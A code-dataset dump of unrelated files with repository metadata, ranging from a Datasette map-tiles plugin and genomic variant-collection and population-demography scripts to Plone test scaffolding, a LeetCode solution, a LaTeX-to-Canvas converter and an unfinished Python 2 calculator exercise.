b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\xac"
b"\x03\x05\xddg\xde\x01\xd26\xe7\xdd\x00\x00\x00\x00IEND\xaeB`\x82"
)
SELECT_TILE_SQL = """
select
tile_data
from
tiles
where
zoom_level = :z
and tile_column = :x
and tile_row = :y
""".strip()
@hookimpl
def register_routes():
return [
(r"/-/tiles$", index),
(r"/-/tiles/(?P<db_name>[^/]+)$", explorer),
(r"/-/tiles/(?P<db_name>[^/]+)/(?P<z>\d+)/(?P<x>\d+)/(?P<y>\d+)\.png$", tile),
(r"/-/tiles-stack$", tiles_stack_explorer),
(r"/-/tiles-stack/(?P<z>\d+)/(?P<x>\d+)/(?P<y>\d+)\.png$", tiles_stack),
]
async def index(datasette):
return Response.html(
await datasette.render_template(
"tiles_index.html",
{"mbtiles_databases": await detect_mtiles_databases(datasette)},
)
)
async def load_tile(db, request):
z = request.url_vars["z"]
x = request.url_vars["x"]
y = request.url_vars["y"]
result = await db.execute(
SELECT_TILE_SQL,
{
"z": z,
"x": x,
"y": y,
},
)
if not result.rows:
return None
return result.rows[0][0]
async def tile(request, datasette):
db_name = request.url_vars["db_name"]
mbtiles_databases = await detect_mtiles_databases(datasette)
if db_name not in mbtiles_databases:
raise NotFound("Not a valid mbtiles database")
db = datasette.get_database(db_name)
tile = await load_tile(db, request)
if tile is None:
return Response(body=PNG_404, content_type="image/png", status=404)
return Response(body=tile, content_type="image/png")
async def tiles_stack(datasette, request):
priority_order = await tiles_stack_database_order(datasette)
# Try each database in turn
for database in priority_order:
tile = await load_tile(database, request)
if tile is not None:
return Response(body=tile, content_type="image/png")
return Response(body=PNG_404, content_type="image/png", status=404)
async def explorer(datasette, request):
db_name = request.url_vars["db_name"]
mbtiles_databases = await detect_mtiles_databases(datasette)
if db_name not in mbtiles_databases:
raise NotFound("Not a valid mbtiles database")
db = datasette.get_database(db_name)
metadata = {
row["name"]: row["value"]
for row in (await db.execute("select name, value from metadata")).rows
}
default_latitude = 0
default_longitude = 0
default_zoom = 0
if metadata.get("center") and len(metadata["center"].split(",")) == 3:
default_longitude, default_latitude, default_zoom = metadata["center"].split(
","
)
min_zoom = 0
max_zoom = 19
if metadata.get("minzoom"):
min_zoom = metadata["minzoom"]
if metadata.get("maxzoom"):
max_zoom = metadata["maxzoom"]
attribution = metadata.get("attribution") or None
return Response.html(
await datasette.render_template(
"tiles_explorer.html",
{
"metadata": metadata,
"db_name": db_name,
"db_path": datasette.urls.database(db_name),
"default_latitude": default_latitude,
"default_longitude": default_longitude,
"default_zoom": default_zoom,
"min_zoom": min_zoom,
"max_zoom": max_zoom,
"attribution": json.dumps(attribution),
},
)
)
async def tiles_stack_explorer(datasette):
attribution = ""
# Find min/max zoom by looking at the stack
priority_order = await tiles_stack_database_order(datasette)
min_zooms = []
max_zooms = []
attributions = []
for db in priority_order:
metadata = {
row["name"]: row["value"]
for row in (await db.execute("select name, value from metadata")).rows
}
if "minzoom" in metadata:
min_zooms.append(int(metadata["minzoom"]))
if "maxzoom" in metadata:
max_zooms.append(int(metadata["maxzoom"]))
# If all attributions are the same, use that - otherwise leave blank
if len(set(attributions)) == 1:
attribution = attributions[0]
min_zoom = min(min_zooms)
max_zoom = max(max_zooms)
return Response.html(
await datasette.render_template(
"tiles_stack_explorer.html",
{
"default_latitude": 0,
"default_longitude": 0,
"default_zoom": min_zoom,
"min_zoom": min_zoom,
"max_zoom": max_zoom,
"attribution": json.dumps(attribution),
},
)
)
@hookimpl
def database_actions(datasette, database):
async def inner():
mbtiles_databases = await detect_mtiles_databases(datasette)
if database in mbtiles_databases:
return [
{
"href": datasette.urls.path("/-/tiles/{}".format(database)),
"label": "Explore these tiles on a map",
}
]
return inner
@hookimpl
def table_actions(datasette, database, table):
async def inner():
if table != "tiles":
return None
mbtiles_databases = await detect_mtiles_databases(datasette)
if database in mbtiles_databases:
return [
{
"href": datasette.urls.path("/-/tiles/{}".format(database)),
"label": "Explore these tiles on a map",
}
]
return inner
|
[
"swillison@gmail.com"
] |
swillison@gmail.com
|
38ae0d1a558d1e120aea23f100feba10b508b6d0
|
5789f30bc942dde4235668c56408575b0bd25599
|
/variantBase/variantList/collect_run_variants_to_variantlist.py
|
62ac9d99d2ae82a73481e7879aa4aacca561689e
|
[] |
no_license
|
bioinfo-chu-bdx/ngs-somatic
|
bc9dfa60872a644f18650593d144726d0ab22767
|
8cc6411e16784f2891b92241a97c71788408ffb5
|
refs/heads/master
| 2023-04-25T19:48:52.073672
| 2021-03-19T14:21:49
| 2021-03-19T14:21:49
| 374,675,975
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,329
|
py
|
#!/usr/bin/python
import sys
import re
import json
import xlrd
import glob
import os
import openpyxl
# THIS SCRIPT UPDATE THE COMPLETE VariantList_ALL.json FROM RUN LIST OR SINGLE RUN FOLDER IN ARGV.
# VARIANTLIST JSON CONTAINS RunName, Sample, Variant Data (chrm, start, stop, ref, alt, varcov, poscov). EXEMPLE :
#"Auto_user_PGM-165-Run98_35pM_Chef_SBT_colon_lung_v4_318v2_234": {
#"SAMPLE-AF454G": [
#["chr4", 55599436, 55599436, "T", "C", 405, 1245],
#["chr7", 55599438, 55599438, "G", "C", 120, 1040],
# ]
# USAGE : python collect_run_variants_to_variantlist.py
# OR : python collect_run_variants_to_variantlist.py /path/to/run_folder
pipeline_folder = os.environ['NGS_PIPELINE_BX_DIR']
variant_list_path = '%s/variantBase/variantList/variantList_ALL.json' % pipeline_folder
run_list_path = '%s/variantBase/runList/runList_ALL.fullpath.txt' % pipeline_folder
variantlist = {}
if os.path.exists(variant_list_path):
with open(variant_list_path, 'r') as g:
variantlist = json.load(g)
run2write_ordered = []
if len(sys.argv)>1:
run_list = [sys.argv[1]]
else:
run_list = []
rl = open(run_list_path,'r')
for run in rl:
run_folder = run.replace('\n','')
run_list.append(run_folder)
for run_folder in run_list:
# RUN TABLE
if run_folder.endswith('/'):
run = run_folder.split('/')[-2]
else:
run = run_folder.split('/')[-1]
run2write_ordered.append(run)
barcodes_json = False
with open(run_folder+'/barcodes.json', 'r') as g:
barcodes_json = json.load(g)
if run not in variantlist:
variantlist[run] = {}
else:
print "*already in variantlist* %s" % run
continue
print "- collecting %s ..." % run
for barcode in barcodes_json:
sample = barcodes_json[barcode]['sample']
dna_number = barcodes_json[barcode]['sample_id']
#if dna_number == 'CONTROL':
#continue
if sample not in variantlist[run]:
variantlist[run][sample] = []
finalreport_paths = glob.glob('%s/%s/*%s_%s*finalReport*'%(run_folder,sample,sample,barcode))
if finalreport_paths:
for fp_path in finalreport_paths:
if '~$' in fp_path: # fichier temporaire
continue
if fp_path.endswith('.xls'):
#xlrd
fp = xlrd.open_workbook(fp_path)
anno_sheet = fp.sheet_by_index(0)
for j in range(anno_sheet.ncols):
if anno_sheet.cell_value(0,j) in ['Chr','chr','Chromosome','chromosome','chrom','Chrom']:
chromosome_index = j
elif anno_sheet.cell_value(0,j) in ['Start_Position','Position','Start.Pos','Start.Pos.','Start','start','Position','Pos.']:
start_index = j
elif anno_sheet.cell_value(0,j) in ['Ref.seq','Ref.Seq','Ref.seq.','Ref.Seq.','Ref','ref']:
ref_index = j
elif anno_sheet.cell_value(0,j) in ['Var.seq','Var.Seq','Alt','Var.seq.','Var.Seq.','alt']:
alt_index = j
elif anno_sheet.cell_value(0,j) in ['Var.Cov.','var.cov.']:
varcov_index = j
elif anno_sheet.cell_value(0,j) in ['Pos.Cov.','Depth']:
poscov_index = j
### PARSE XLS
for i in range(1,anno_sheet.nrows):
chrm = anno_sheet.cell_value(i,chromosome_index)
ref = anno_sheet.cell_value(i,ref_index)
alt = anno_sheet.cell_value(i,alt_index)
if chrm and ref and alt :
start = int(anno_sheet.cell_value(i,start_index))
varcov = int(anno_sheet.cell_value(i,varcov_index))
poscov = int(anno_sheet.cell_value(i,poscov_index))
if ref == '-':
stop = start + 1
elif alt == '-':
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
elif len(ref) > 1 or len(alt) > 1:
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
else:
stop = start
variant = [str(chrm),start,stop,str(ref),str(alt),varcov,poscov]
if variant not in variantlist[run][sample]:
variantlist[run][sample].append(variant)
elif fp_path.endswith('.xlsx'):
#openpyxl
fp = openpyxl.load_workbook(fp_path)
anno_sheetname = fp.sheetnames[0]
anno_sheet = fp[anno_sheetname]
for ncol in range(anno_sheet.max_column):
if anno_sheet.cell(row=1,column=ncol+1).value in ['Chr','chr','Chromosome','chromosome','chrom','Chrom']:
chromosome_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Start_Position','Position','Start.Pos','Start.Pos.','Start','start','Position','Pos.']:
start_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Ref.seq','Ref.Seq','Ref.seq.','Ref.Seq.','Ref','ref']:
ref_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Var.seq','Var.Seq','Alt','Var.seq.','Var.Seq.','alt']:
alt_index = ncol+1
if anno_sheet.cell(row=1,column=ncol+1).value in ['Var.Cov.','var.cov.']:
varcov_index = ncol+1
if anno_sheet.cell(row=1,column=ncol+1).value in ['Pos.Cov.','Depth']:
poscov_index = ncol+1
### PARSE XLSX
for nrow in range(2,anno_sheet.max_row+1):
chrm = anno_sheet.cell(row=nrow,column=chromosome_index).value
ref = anno_sheet.cell(row=nrow,column=ref_index).value
alt = anno_sheet.cell(row=nrow,column=alt_index).value
if chrm and ref and alt :
start = int(anno_sheet.cell(row=nrow,column=start_index).value)
varcov = int(anno_sheet.cell(row=nrow,column=varcov_index).value)
poscov = int(anno_sheet.cell(row=nrow,column=poscov_index).value)
if ref == '-':
stop = start + 1
elif alt == '-':
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
elif len(ref) > 1 or len(alt) > 1:
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
else:
stop = start
variant = [str(chrm),start,stop,str(ref),str(alt),varcov,poscov]
if variant not in variantlist[run][sample]:
variantlist[run][sample].append(variant)
else:
print "**WARNING (FINALREPORT FILE EXTENSION weird )** %s" % fp_path
#print "\t- %s : %s variants" % (sample,len(variantlist[run][sample]))
else:
print "**WARNING (NO FINALREPORT found for SAMPLE )** %s" % sample
print "- WRITING VARIANTLIST JSON..."
# routine d'ecriture differente de json dumps indent qui prend trop de lignes
with open(variant_list_path,'w') as vljson:
vljson.write('{\n')
for i in range(len(run2write_ordered)) :
run = run2write_ordered[i]
vljson.write('\t"%s": {\n' % run)
for j in range(len(variantlist[run].keys())):
sample = variantlist[run].keys()[j]
vljson.write('\t\t"%s": [\n' % (sample))
for k in range(len(variantlist[run][sample])):
variant = str(variantlist[run][sample][k]).replace('\'','"').replace('u"','"')
if k == (len(variantlist[run][sample])-1):
vljson.write('\t\t\t%s\n' % variant)
else:
vljson.write('\t\t\t%s,\n' % variant)
if j == (len(variantlist[run].keys())-1):
vljson.write('\t\t]\n')
else:
vljson.write('\t\t],\n')
if i == (len(run2write_ordered)-1):
vljson.write('\t}\n')
else:
vljson.write('\t},\n')
vljson.write('}\n')
|
[
"thomas.bandres@chu-bordeaux.fr"
] |
thomas.bandres@chu-bordeaux.fr
|
f4ed06e7ea8b347da25f534ba02242feff4c32b1
|
0e878d60050d3e34f33ab3f1bbfc0a0551e421d9
|
/fui/fsbrowse/tests/base.py
|
998b0711d09a90a7b2461a7454bea1d2aacf71dc
|
[] |
no_license
|
espenak/fui.fsbrowse
|
bca49b7a82ffcad8e984490ed486d7038062ae8c
|
ba2ddd37f2fde9b0189336f50c995849de25ac45
|
refs/heads/master
| 2021-01-20T09:41:17.205327
| 2009-11-06T12:48:51
| 2009-11-06T12:48:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,062
|
py
|
from Products.Five import zcml
from Products.Five import fiveconfigure
from Testing import ZopeTestCase as ztc
from Products.PloneTestCase import PloneTestCase as ptc
from Products.PloneTestCase.layer import onsetup
from Products.Five.testbrowser import Browser
from zope.component import getUtility, getMultiAdapter
from plone.portlets.interfaces import IPortletManager
from plone.portlets.interfaces import IPortletAssignmentMapping
from Products.PloneTestCase.setup import portal_owner, default_password
@onsetup
def setup_fui_fsbrowse():
    """Set up the additional products required for the fui.fsbrowse product.
    The @onsetup decorator causes the execution of this body to be deferred
    until the setup of the Plone site testing layer.
    """
    # Load the ZCML configuration for the fui.fsbrowse package.
    # (The original comment referenced "optilux.policy" -- a copy-paste
    # leftover from the tutorial this file was based on.)
    # Debug mode gives full tracebacks if the ZCML fails to parse.
    fiveconfigure.debug_mode = True
    import fui.fsbrowse
    zcml.load_config('configure.zcml', fui.fsbrowse)
    fiveconfigure.debug_mode = False
    # We need to tell the testing framework that these products
    # should be available. This can't happen until after we have loaded
    # the ZCML.
    ztc.installPackage('fui.fsbrowse')
# The order here is important: We first call the (deferred) function which
# installs the products we need for this package. Then, we let
# PloneTestCase set up this product on installation.
setup_fui_fsbrowse()
ptc.setupPloneSite(products=['fui.fsbrowse'])
class FuiFsBrowseTestCase(ptc.PloneTestCase):
    """Base class used for (unit/integration) test cases of fui.fsbrowse."""
class FuiFsBrowseFunctionalTestCase(ptc.FunctionalTestCase):
    """Test case class used for functional (doc-)tests."""

    def afterSetUp(self):
        """Create a test browser and strip portlets that add noise."""
        self.browser = Browser()
        # The following is useful when writing and debugging browser tests.
        # It lets us see error messages properly instead of generic pages.
        self.browser.handleErrors = False
        self.portal.error_log._ignored_exceptions = ()
        # Turn off the various portlets, because they sometimes duplicate
        # links and text (e.g. the navtree, the recent items listing) that
        # we wish to test for in our own views.  Having no portlets makes
        # things easier.  The left/right removal was duplicated inline in
        # the original; factored into a helper.
        self._remove_portlets(u"plone.leftcolumn")
        self._remove_portlets(u"plone.rightcolumn")

    def _remove_portlets(self, manager_name):
        """Delete every portlet assignment from the named portlet column."""
        column = getUtility(IPortletManager, name=manager_name)
        assignable = getMultiAdapter((self.portal, column),
                                     IPortletAssignmentMapping)
        # Iterate over a snapshot of the keys since we mutate the mapping.
        for name in list(assignable.keys()):
            del assignable[name]

    def loginAdminClick(self):
        """Log in through the login form as the portal owner."""
        portal_url = self.portal.absolute_url()
        self.browser.open(portal_url + '/login_form?came_from=' + portal_url)
        self.browser.getControl(name='__ac_name').value = portal_owner
        self.browser.getControl(name='__ac_password').value = default_password
        self.browser.getControl(name='submit').click()

    def logoutClick(self):
        """Log out via the "Log out" link.

        The original computed ``portal_url`` here but never used it; the
        dead local has been removed.
        """
        self.browser.getLink("Log out").click()
|
[
"post@espenak.net"
] |
post@espenak.net
|
1b2e1b202bfb75864577236b2e5b92566bd75690
|
0c8cbe2f3d69c92dcd0cc73da88f1340624809f2
|
/search/urls.py
|
3063c9854c0b76535380cbf020f58478264616b5
|
[] |
no_license
|
JunchuangYang/OnlineMusicWebsite
|
83451b03aad5ba8bf8a7402a8e7f21ca5c0d1c24
|
475ebea77e8488f08883203e509cc8b7c9043bbd
|
refs/heads/master
| 2021-07-25T01:27:14.673494
| 2020-04-05T08:23:07
| 2020-04-05T08:23:07
| 252,178,555
| 0
| 0
| null | 2021-06-10T22:43:53
| 2020-04-01T13:09:47
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 151
|
py
|
#__author__ = 'lenovo'
from django.urls import path
from . import views

# URL routes for the search app: ``<page>.html`` captures the (int) results
# page number and passes it to the search view as ``page``.
urlpatterns = [
    path('<int:page>.html',views.searchView ,name = 'search')
]
|
[
"554002970@qq.com"
] |
554002970@qq.com
|
704da8e2d99a67413d641ece944fa1a4042d6e8e
|
07f33106eeda3dff104105250fb5d299938bff6b
|
/数组/1552_两球之间的磁力.py
|
c25e73b1afbf4e08ff3f0127684b147103fef6d8
|
[] |
no_license
|
fadeawaylove/leetcode_practice
|
5e40c3bcf8f7721bc1a843b7ac820041eae5c89b
|
74809f13f43e74a19f5a9f8d908cfe6a9ec774b2
|
refs/heads/master
| 2023-01-02T05:35:57.529975
| 2020-10-28T06:03:59
| 2020-10-28T06:03:59
| 267,814,149
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,504
|
py
|
"""
在代号为 C-137 的地球上,Rick 发现如果他将两个球放在他新发明的篮子里,它们之间会形成特殊形式的磁力。Rick 有 n 个空的篮子,第 i 个篮子的位置在 position[i] ,Morty 想把 m 个球放到这些篮子里,使得任意两球间 最小磁力 最大。
已知两个球如果分别位于 x 和 y ,那么它们之间的磁力为 |x - y| 。
给你一个整数数组 position 和一个整数 m ,请你返回最大化的最小磁力。
示例 1:
输入:position = [1,2,3,4,7], m = 3
输出:3
解释:将 3 个球分别放入位于 1,4 和 7 的三个篮子,两球间的磁力分别为 [3, 3, 6]。最小磁力为 3 。我们没办法让最小磁力大于 3 。
示例 2:
输入:position = [5,4,3,2,1,1000000000], m = 2
输出:999999999
解释:我们使用位于 1 和 1000000000 的篮子时最小磁力最大。
提示:
n == position.length
2 <= n <= 10^5
1 <= position[i] <= 10^9
所有 position 中的整数 互不相同 。
2 <= m <= position.length
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/magnetic-force-between-two-balls
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
from typing import List
class Solution:
    def maxDistance(self, position: List[int], m: int) -> int:
        """Return the maximized minimum distance between any two of ``m``
        balls placed into baskets at the given (distinct integer) positions.

        Binary-searches the answer gap; a greedy feasibility check places
        each ball in the first basket at least ``gap`` beyond the previous
        one.  O(n log n) sort + O(n log(max_gap)) search.

        Fixes vs. original: removed the leftover debug ``print`` inside the
        search loop, and dropped the dead ``min_gap`` pre-computation
        (``min(1, gap)`` can never exceed 1, and distinct integer positions
        guarantee every gap >= 1, so the lower bound is simply 1).
        """
        position = sorted(position)

        def _can_place(gap: int) -> bool:
            # Greedy: drop the next ball in the first basket that is at
            # least `gap` past the previously used basket.
            count = 1
            prev = position[0]
            for pos in position[1:]:
                if pos - prev >= gap:
                    count += 1
                    prev = pos
                    if count >= m:
                        return True
            return False

        lo = 1                                            # always feasible
        hi = (position[-1] - position[0]) // (m - 1)      # pigeonhole upper bound
        while hi >= lo:
            gap = (lo + hi) // 2
            if _can_place(gap):
                lo = gap + 1   # feasible: try a larger gap
            else:
                hi = gap - 1   # infeasible: shrink
        return lo - 1
# Ad-hoc smoke test; expected output for the first example is 3.
print(Solution().maxDistance([1, 2, 3, 4, 7], m=3))
# print(Solution().maxDistance([5, 4, 3, 2, 1, 1000000000], m=2))
# print(Solution().maxDistance([79, 74, 57, 22], m=4))
|
[
"dengrt@akulaku.com"
] |
dengrt@akulaku.com
|
e8ec0cd093e9e24840ac391ba6873cc50d9f170a
|
6b1b506139088aa30de9fd65cff9e3b6a3a36874
|
/sofia_redux/toolkit/fitting/tests/test_polynomial/test_linear_vector_lstsq.py
|
6e23b6f9ff2c919be37c0f4bf09177809de894cd
|
[
"BSD-3-Clause"
] |
permissive
|
SOFIA-USRA/sofia_redux
|
df2e6ad402b50eb014b574ea561734334d70f84d
|
493700340cd34d5f319af6f3a562a82135bb30dd
|
refs/heads/main
| 2023-08-17T11:11:50.559987
| 2023-08-13T19:52:37
| 2023-08-13T19:52:37
| 311,773,000
| 12
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import pytest
from sofia_redux.toolkit.fitting.polynomial \
import linear_equation, linear_vector_lstsq
@pytest.fixture
def data():
    """Return (alpha, beta) normal-equation terms for a small 2x2 system."""
    a = np.array([[3, 4], [5, 6.]])
    b = np.array([[7., 8]])
    alpha, beta = linear_equation(a, b)
    return alpha, beta
def test_expected(data):
    """The least-squares solution at the query point [3.5, 4.5] is 5.5,
    returned with shape (1, 1)."""
    alpha, beta = data
    result = linear_vector_lstsq(alpha, beta, np.array([[3.5, 4.5]]).T)
    assert np.allclose(result, 5.5)
    assert result.shape == (1, 1)
|
[
"melanie.j.clarke@nasa.gov"
] |
melanie.j.clarke@nasa.gov
|
d5d60ae5edaf5a5eb22194b2a9d172139d102b63
|
ad0567e70e3c448955b25aa4a6d8e6e30027b7b1
|
/scripts/canvastex.py
|
daf2b04f6d00eb6f03af3a5d6f25677f13d8f9b7
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
dsavransky/grading
|
8409f800335296cd15f604c7f5af86cd0c25a31d
|
5925cbdcf82b1eed90c927a35c2bc1bf6de13fae
|
refs/heads/main
| 2022-08-12T22:52:34.076808
| 2022-07-22T15:27:15
| 2022-07-22T15:27:15
| 209,359,426
| 8
| 4
|
MIT
| 2021-10-06T12:57:03
| 2019-09-18T16:50:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,236
|
py
|
#!python
import argparse
import urllib.parse
import re
import os.path
def convlatex(texstr):
    """Render a LaTeX snippet as Canvas's equation ``<img>`` HTML.

    Accepts a plain string, or an ``re.Match`` (so it can serve directly as
    an ``re.sub`` replacement callback), in which case the first capture
    group is taken as the LaTeX source.  The source is percent-encoded
    twice, which is what Canvas's equation_images URLs expect.
    """
    if isinstance(texstr, re.Match):
        texstr = texstr.group(1)
    encoded = urllib.parse.quote(urllib.parse.quote(texstr))
    return (
        '<img class="equation_image" title="{0}" '
        'src="https://canvas.cornell.edu/equation_images/{1}" '
        'alt="LaTeX: {0}">'.format(texstr, encoded)
    )
def convall(text):
    """Replace every ``$...$`` / ``$$...$$`` region in *text* with the
    corresponding Canvas ``<img>`` HTML (via ``convlatex``)."""
    return re.sub(r"\${1,2}(.*?)\${1,2}", convlatex, text)
if __name__ == "__main__":
    # CLI entry point: the positional argument is either a literal LaTeX
    # string or a path to a file containing the text to convert.
    parser = argparse.ArgumentParser(
        description="Convert LaTeX input to Canvas-style html."
    )
    parser.add_argument(
        "texstr", nargs=1, type=str, help="LaTeX input or file (string)."
    )
    parser.add_argument(
        "--par",
        action="store_true",
        help="Treat input as paragraph with embedded LaTeX with $ or $$ delimiters",
    )
    args = parser.parse_args()
    texstr = args.texstr[0]
    # If the argument names an existing file, use the file's contents.
    if os.path.exists(texstr):
        with open(texstr, "r") as f:
            texstr = f.read()
    # --par: convert each embedded $...$ region; otherwise treat the whole
    # input as one LaTeX expression.
    if args.par:
        qtxt = convall(texstr)
    else:
        qtxt = convlatex(texstr)
    print(qtxt)
    exit(0)
|
[
"dsavransky@gmail.com"
] |
dsavransky@gmail.com
|
5588bd437577ce0e40d6e6d5de7128a2ee7fca69
|
925f2935b34042abc9161795413031ae68f45b9a
|
/multimodel_inference/SC3elsm.py
|
859de2c0b23b9b122810c0220fa1cecd7c1363ea
|
[] |
no_license
|
Farhad63/AFS-analysis-with-moments
|
7e1d17f47c06ed97ebb7c9ec8245fe52a88622c3
|
7874b1085073e5f62d910ef2d79a22b29ff3be84
|
refs/heads/master
| 2022-04-09T22:11:12.341235
| 2020-03-11T21:15:42
| 2020-03-11T21:15:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,429
|
py
|
#!/usr/bin/env python
# split, three epochs in each pop, asymmetric migration at same rates in all epochs
# n(para): 11
import matplotlib
matplotlib.use('PDF')
import moments
import pylab
import random
import matplotlib.pyplot as plt
import numpy as np
from numpy import array
from moments import Misc,Spectrum,Numerics,Manips,Integration,Demographics1D,Demographics2D
import sys
# Command line: infile pop1 pop2 proj1 proj2 mu gtime
infile=sys.argv[1]
pop_ids=[sys.argv[2],sys.argv[3]]
projections=[int(sys.argv[4]),int(sys.argv[5])]
#params=[float(sys.argv[6]),float(sys.argv[7]),float(sys.argv[8]),float(sys.argv[9]),float(sys.argv[10]),float(sys.argv[11])]
# Initial parameter guess before random perturbation (11 parameters).
params=[1,1,1,1,1,1,1,1,1,1,0.01]
# mutation rate per sequenced portion of genome per generation: for A.millepora, 0.02
mu=float(sys.argv[6])
# generation time, in thousand years: 0.005 (5 years)
gtime=float(sys.argv[7])
dd = Misc.make_data_dict(infile)
# set Polarized=False below for folded AFS analysis
data = Spectrum.from_data_dict(dd, pop_ids,projections,polarized=True)
ns=data.sample_sizes
np.set_printoptions(precision=3)
#-------------------
# split into unequal pop sizes with asymmetrical migration
def sc3ei(params , ns):
    """Demographic model: population split with three epochs per population.

    Epoch 1: migration at rate m in both directions; epoch 2: isolation
    (no migration); epoch 3: migration resumes at the same rate m.
    p_misid is the proportion of misidentified ancestral states, folded
    back into the AFS by mixing with the reversed spectrum.
    """
    # p_misid: proportion of misidentified ancestral states
    nu1_1, nu2_1, nu1_2,nu2_2,nu1_3,nu2_3,T1, T2, T3,m, p_misid = params
    sts = moments.LinearSystem_1D.steady_state_1D(ns[0] + ns[1])
    fs = moments.Spectrum(sts)
    fs = moments.Manips.split_1D_to_2D(fs, ns[0], ns[1])
    # epoch 1: sizes (nu1_1, nu2_1), migration m both ways
    fs.integrate([nu1_1, nu2_1], T1, m = np.array([[0, m], [m, 0]]))
    # epoch 2: isolation (zero migration matrix)
    fs.integrate([nu1_2, nu2_2], T2, m = np.array([[0, 0], [0, 0]]))
    # epoch 3: migration resumes at the same rate
    fs.integrate([nu1_3, nu2_3], T3, m = np.array([[0, m], [m, 0]]))
    return (1-p_misid)*fs + p_misid*moments.Numerics.reverse_array(fs)
func=sc3ei
# Optimisation bounds for the 11 parameters (sizes, times, migration, p_misid).
upper_bound = [100, 100, 100,100,100, 100, 100, 100,100, 200,0.25]
lower_bound = [1e-3,1e-3, 1e-3,1e-3,1e-3,1e-3,1e-3,1e-3,1e-3,1e-5,1e-5]
# Randomly perturb the starting point (up to 2-fold) so replicate runs
# explore different basins.
params = moments.Misc.perturb_params(params, fold=2, upper_bound=upper_bound,
                              lower_bound=lower_bound)
poptg = moments.Inference.optimize_log(params, data, func,
                                   lower_bound=lower_bound,
                                   upper_bound=upper_bound,
                                   verbose=False, maxiter=30)
# extracting model predictions, likelihood and theta
model = func(poptg, ns)
ll_model = moments.Inference.ll_multinom(model, data)
theta = moments.Inference.optimal_sfs_scaling(model, data)
# random index for this replicate
ind=str(random.randint(0,999999))
# plotting demographic model
plot_mod = moments.ModelPlot.generate_model(func, poptg, ns)
moments.ModelPlot.plot_model(plot_mod, save_file="sc3elsm_"+ind+".png", pop_labels=pop_ids, nref=theta/(4*mu), draw_scale=False, gen_time=gtime, gen_time_units="KY", reverse_timeline=True)
# bootstrapping for SDs of params and theta
all_boot=moments.Misc.bootstrap(dd,pop_ids,projections)
uncert=moments.Godambe.GIM_uncert(func,all_boot,poptg,data)
# printing parameters and their SDs (Python 2 print statement)
print "RESULT","sc3elsm",ind,len(params),ll_model,sys.argv[1],sys.argv[2],sys.argv[3],poptg,theta,uncert
# plotting quad-panel figure witt AFS, model, residuals:
moments.Plotting.plot_2d_comp_multinom(model, data, vmin=1, resid_range=3,
                                    pop_ids =pop_ids)
plt.savefig("sc3elsm_"+ind+"_"+sys.argv[1]+"_"+sys.argv[2]+"_"+sys.argv[3]+"_"+sys.argv[4]+"_"+sys.argv[5]+'.pdf')
|
[
"matz@utexas.edu"
] |
matz@utexas.edu
|
370cd35756182e41352487f83230411fd0926a55
|
7c8fd5af8ade349f1d9f59c40cf9d5cda2755814
|
/calculator.py
|
80b33d64a550e7940ce55a1ef43fa6d6fb5af57d
|
[] |
no_license
|
emilydowgialo/calculator-2
|
47cf6c31889ea56847e84b58f8e6c70f4336084f
|
393aca0b3018192ecc3db68ff59a183438485e9e
|
refs/heads/master
| 2016-08-11T07:48:06.250197
| 2016-04-07T19:59:55
| 2016-04-07T19:59:55
| 55,652,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,431
|
py
|
"""
calculator.py
Using our arithmetic.py file from Exercise02, create the
calculator program yourself in this file.
"""
from arithmetic import *
# Your code goes here
def calc_function():
value_returned = False
calculating = True
while calculating == True:
while value_returned == False:
input = raw_input("> ")
tokens = input.split(" ") # parsing user's input by space
token_list = tokens[1:]
# num1 = int(tokens[1]) # converting user input into integer
# if len(tokens) == 2: # accomodates additional parameters
# num2 = int(tokens[2]) # converting user input into integer
# if len(tokens) > 2:
# additional_numbers = int(tokens[1:])
if tokens[0] == "+": # add function
print add(token_list) # calling the add function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "-": # subtract function
print subtract(num1, num2) # calling the subtr function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "*": # multiply function
print multiply(num1, num2) # calling the multiply function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "/": # divide function
print divide(num1, num2) # calling the divide function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "square":
print square(num1)
value_returned = True
if tokens[0] == "cube":
print cube(num1)
value_returned = True
if tokens[0] == "pow":
print power(num1, num2)
value_returned = True
if tokens[0] == "mod":
print mod(num1, num2)
value_returned = True
continue_playing = raw_input("Would you like to continue calculating? Type 1 for yes and type 2 for no: ")
if continue_playing == "1":
value_returned = False
elif continue_playing == "2":
calculating = False
print "goodbye"
else:
print "Error: you did not type 1 or 2!"
